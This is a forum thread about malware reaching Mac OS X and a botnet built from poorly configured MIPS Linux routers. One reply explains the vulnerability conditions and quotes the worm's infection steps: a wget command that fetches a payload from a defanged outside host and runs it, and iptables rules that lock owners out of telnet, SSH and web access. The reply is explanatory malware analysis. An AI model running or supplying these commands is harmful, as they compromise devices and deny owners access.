[zeugma]

While computers running Mac OS X have traditionally benefited from security through obscurity -- the far larger installed base of Windows machines continues to be the most attractive target for malware creators -- that advantage has been eroding because of the popularity of cross-platform software and the rising installed base of Mac OS X devices, among other factors.

OMFG! Do these people not even read industry news? For the past week, there has been all kinds of stories out there about botnets being built with freaking routers. What's the install base of Linksys routers running DD-WRT?  I mean come on! When are they going to give up on that 'security by obscurity' canard?

[snowsislander]

OMFG! Do these people not even read industry news? For the past week, there has been all kinds of stories out there about botnets being built with freaking routers. What's the install base of Linksys routers running DD-WRT?  I mean come on! When are they going to give up on that 'security by obscurity' canard?

Yes, you have a good point. I hadn't myself heard about this router bot-net until I saw your post, but I did some research and it appears not only are we talking about a relatively small base of equipment, but the equipment has to be dangerously configured to even be vulnerable:

You are only vulnerable if:

1. Your device is a mipsel (MIPS running in little-endian mode, this is what the worm is compiled for) device.
2. Your device also has telnet, SSH or web-based interfaces available to the WAN, and
3. Your username and password combinations are weak, OR the daemons that your firmware uses are exploitable.

   As such, 90% of the routers and modems participating in this botnet are participating due to user-error (the user themselves or otherwise). Unfortunately, it seems that some of the people covering this botnet do not understand this point, and it is making us look like a bunch of idiots.

It does look like more than just DD-WRT routers are targeted; it appears to me that the exploitation method (once they have a root shell on a poorly configured machine) is fairly universal for any mipsel unit running most any Linux-based router code:

Get a shell on the vulnerable device (methods vary). Once a shell is acquired, the bot does the following things:

# rm -f /var/tmp/udhcpc.env
# wget

If wget is present, then it uses wget to download hxxp://dweb.webhop.net/.bb/udhcpc.env , and runs it in the background.

If wget is not present, the bot looks for "busybox ftpget", and then tries falling back to a tftp client. Once it is downloaded, it launches it in the background. The following snippet is the variant it uses if it finds that wget is usable.

# wget hxxp://dweb.webhop.net/.bb/udhcpc.env -P /var/tmp && chmod +x /var/tmp/udhcpc.env && /var/tmp/udhcpc.env &

udhcpc.env 100% |*****************************| 33744 00:00 ETA

It then takes several steps to lock anybody out of the device, including blocking telnet, sshd and web ports.

# iptables -A INPUT -p tcp --dport 23 -j DROP
# iptables -A INPUT -p tcp --dport 22 -j DROP
# iptables -A INPUT -p tcp --dport 80 -j DROP

This concludes the infection process.